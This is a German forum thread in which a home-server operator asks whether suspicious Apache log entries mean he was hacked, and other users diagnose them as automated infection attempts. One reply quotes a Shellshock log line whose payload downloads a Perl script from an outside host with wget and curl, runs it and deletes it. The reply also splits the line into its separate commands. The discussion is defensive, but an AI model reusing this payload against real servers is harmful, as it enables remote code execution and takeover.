ComputerBase Menü
Aktuelles

Virus bzw. Angriff? - music-set.net

N

NichTec

Ensign
Registriert
Juli 2014
Beiträge
167
Hallo zusammen!

Ich hoste für einen Verein eine Cloud. Jetzt habe ich mir die Tage mal eher aus langeweile die Logdateien der letzten Wochen durchgesehen und auf die Logdatei im Anhang gestoßen. Alles normale habe ich mal rausgestrichen. Ich stolpere aber immer über die ganzen "wget..." und "HEAD". Das sieht jetzt nicht sehr vertrauenserweckent aus...

Hab ich mir da einen Virus eingefangen, oder hat sich doch jemand ins System gehackt?

Ich hoffe ihr könnte mir (je nach Gefahr möglichst bald...) helfen.

Danke!!!

Anhang anzeigen logdatei.txt
 
Sieht ganz normal nach einem (oder mehreren) Bot/-s aus, welcher deine Seite durchforstet.

Webspace, Managed Server oder Server mit Root-Zugriff?
 
Aber warum tauchen bei mir dann schreibbefehle auf irgendwelche "a2.log"? Wie kann der Bot solche Schreibbefehle auslösen?

CryNickSystems schrieb:
Webspace, Managed Server oder Server mit Root-Zugriff?
Zum Vergrößern anklicken....
Eigener Server im Keller
 
Hi,

sorry wenn ich das so uncharmant sage, aber: wieso betreibst du bitte einen eigenen Server im Internet von dir zu Hause aus, wenn dir offenkundig Grundlagen fehlen?

VG,
Mad
 
Sehr nice, sobald ich:
h ttp://test.music-set.net/mobile/a2.log (ja, der Space ist extra drin) in meinem Browser öffne, springt direkt der Windows Defender an und sagt: "Malware erkannt".

Wo kommt die Datei a2.log denn her?
 
Weil ich ehrlichgesagt davon ausgegangen war, dass ich das nötige Wissen habe...
Bevor ich den Server installiert habe, habe ich Wochen damit verbracht mich einzulesen und habe das ganze System dann noch 1,5 Monate offline betrieben. Dabei habe ich dann Firewall, Antivirenprogramm, Fail2ban, etc. eingerichtet. Ich dachte eigentlich, dass alles sicherheitsrelevante getan sein, und habe mich daher kaum mit Sachen wie Bots, etc. auseinander gesetzt.
 
Hi,

dann mal gefragt: ist "test.music-set.net" deine Domain?

VG,
Mad
 
CryNickSystems schrieb:
[...]springt direkt der Windows Defender an und sagt: "Malware erkannt".

Wo kommt die Datei a2.log denn her?
Zum Vergrößern anklicken....

Mein Antivirenprogramm sprint schon an, wenn ich nur music-set.net öffnen will.... Daher war ich ja so unsicher.
Woher die Datei kommt? Genau das weiß ich ja nicht. Das so in der Log drinnen. Ich hab die nicht aufgerufen :(
Ergänzung ()

Madman1209 schrieb:
Hi,

dann mal gefragt: ist "test.music-set.net" deine Domain?

VG,
Mad
Zum Vergrößern anklicken....

Nein!
 
Unbenannt.JPG
bitte mal vom netz nehmen, bereinigen und absichern bevor der wieder online geht
 
Bevor wer mit was online geht?
 
naja du mit deinem cloud-hosting für den verein
 
Ich glaube, ich sollte hier nochmal ein paar Sachen klar stellen:

- test.music-set.net ist NICHT meine Domain!
- auf meinem Server habe ich bisher nur die Einträge in der Logdatei gefunden, ansonsten suche ich gerade nach Änderungen...

Daher war meine Frage: Ist das nun ein Bot, oder hat sich da jemand eingehackt?
 
Zeile 112
Code: 
217.14.88.226 - - [05/Jun/2015:21:50:14 +0200] "GET HTTP/1.1 HTTP/1.1" 400 473 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://test.music-set.net/mobile/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://test.music-set.net/mobile/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\");'"

http://serverfault.com/questions/661672/hacking-to-my-apache-using-cgi-script
nimm deinen server vom netz

Code: 
wget http://_test.music-set.net/mobile/a2_.log_xx -O /tmp/a2.log
http://wiki.ubuntuusers.de/wget

curl -O /tmp/a2.log http://_test.music-set.net/mobile/a2_.log_xx
https://wiki.ubuntuusers.de/cURL

perl /tmp/a2.log;rm -rf /tmp/a2.log
http://wiki.ubuntuusers.de/rm

/edit: hab versucht den inhalt der a2.log zu lesen
ist nicht grad leicht
 
Zuletzt bearbeitet:
Das sind nur Infektionsversuche per Script. Aber die Versuche bekommen nur einen 404 zurück. Das ist nur wildes Rumsuchen nach einer Lücke.

Lern bitte das Lesen von Logfiles. Da steht die angeforderte URL, der Statuscode und der Querystring im Logfile.
Das sind alles eingehende Verbindungen, bei denen die URL nicht gefunden wird.
 
Zuletzt bearbeitet:
Das ist ein Perl-Skript was scheinbar eine Reverse-Shell öffnet um die Kontrolle von dem Rechner zu übernehmen.

Bitte sofort vom Netz nehmen!!

Könnte schon längst alles mögliche ausliefern, was auf deinen Internet-Anschluss zurückfallen könnte.
 
Also der Server ist vom Netz (Apacheservice stoppen sollte eigentlich reichen, oder?), kann also soweit nichts mehr passieren.
Trotzdem ist mir nicht ganz schlüssig, was ihr schildert. Einerseits wird auf 404 (also nicht gefunden) verwiesen, auf der anderen Seite wird geschrieben, dass man die Kontrolle schon erlangt haben könnte...

Könnt ihr mir sagen, was jetzt am Ende zutrifft?

@xammu: Ich habe inzwischen eingesehen, dass ich manchen Bereich doch noch Nachholbedarf ist, und habe mich schon daran gemacht, mich einzulesen. Vielen Dank trotzdem für eure geduldigen Antworten!
 
Hi,

ganz ehrlich: bevor man sich in so eine Materie einfach mal schnell einliest, Strom und Haftung selbst trägt, seinen Internet Anschluss auslastet und und und - denkst du da nicht, ein kleiner Server in einem Rechenzentrum, der von Profis gewartet wird wäre einfach sinnvoller?

VG,
Mad
 
Hi,
ich kann euch ja verstehen, daher ist der Server ja auch offline und ich spiele ernsthaft mit dem Gedanken, dass ganze doch abzugeben.

Trotzdem würde ich gerne das Problem noch lösen (wenn auch nur der Interesse halber)...
In den gesamten Logfiles steht immer ein 404 drinnen. Das habe ich mir alles nochmal genauer angeschaut und bin nun zur Ansicht gekommen, dass wohl niemand eingedrungen ist. Könntet ihr aber bitte nochmal euren KOmmentar dazu abgeben?

Ich habe folgendes gemacht:
- die error.log von apache zurgeschaut und dort sind sämtliche nicht gefundene Dateien aufgetaucht (passt zur 404?)
- den gesamten Server nach geänderten Dateien der Endung .log bzw .cgi durchsucht. Bei den .log nur Standardlogdateien und bei cgi gar keine (in den letzten 4 Tagen, der Angriff war vor 2 Tagen)
- mit Wireshark 2 Stunden lang den Netzwerkverkehr mitgeschnitten und nichts auffäliges gefunden was darauf hindeuten könnte, dass ich Dateien ins Internet verschicke.

So, jetzt bräuchte ich aber euer Urteilsvermögen! Wenn irgendwelche Infos fehlen, bitte grad bescheid sagen. Und ja, dass ist nur der Interesse halber. Der Server wird so schnell nicht wieder online gehen!

Danke :)
 
Der Server ist nicht vom Netz wenn man den apache dienst stoppt ^^

Der Server ist vom Netz wenn du eth0 down nimmst oder das Netzwerkkabel ziehst.

Sofern die Kiste kompromittiert ist (Was sie warscheinlich ist) hilft sowieso nur neu installieren.
Der Angreifer kann allen moeglichen Kram installieren - wovon du nix mitbekommst.

So etwas nach zu vollziehen wird lange Zeit in Anspruch nehmen.
Daher: Frisch aufsetzen, Backup einspielen, server ordentlich absichern.

Grueße
 
p4n0 schrieb:
(Was sie warscheinlich ist)
Zum Vergrößern anklicken....

Daher nochmal meine Frage: Woran erkenne ich das? Schließlich wurde alles per 404 verweigert, oder?
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

Buttersniper
(IAPro.exe) VIRUS
Antworten
3
Aufrufe
3.130
ToniMacaroni
ToniMacaroni
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz